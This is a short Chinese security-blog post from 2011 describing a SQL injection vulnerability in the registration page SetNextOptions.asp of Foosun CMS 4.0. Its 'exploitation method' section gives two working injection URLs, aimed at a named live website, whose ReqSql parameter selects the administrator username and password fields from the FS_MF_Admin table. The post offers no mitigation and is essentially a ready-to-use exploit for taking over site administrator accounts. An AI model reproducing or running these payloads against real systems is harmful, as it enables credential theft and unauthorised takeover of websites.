现在的位置: 首页技术文章>正文
风讯4.0 SetNextOptions.asp注册页面漏洞
发表于346 天前 技术文章 暂无评论

影响版本:V4.0
官方地址:www.foosun.net

漏洞类型:SQL注入
漏洞描述:风讯的注册页面…/user/SetNextOptions.asp存在SQL注入漏洞
 

利用方法:
构造注入

http://www.176ku.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

“admin_name” 管理用户名数据库表

http://www.176ku.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

“admin_pass_word” 管理密码数据库表

固定链接: 风讯4.0 SetNextOptions.asp注册页面漏洞 | 网络安全手册 +复制链接

作者:

该日志由 lee 于2011年06月07日发表在技术文章分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 风讯4.0 SetNextOptions.asp注册页面漏洞 | 网络安全手册
【上篇】
【下篇】

给我留言


/ 快捷键:Ctrl+Enter


返回首页

Copyright © 2011-2012 网络安全手册  保留所有权利.     基于 WordPress 技术创建   52次查询   谷歌地图 百度地图
不想听你唠叨×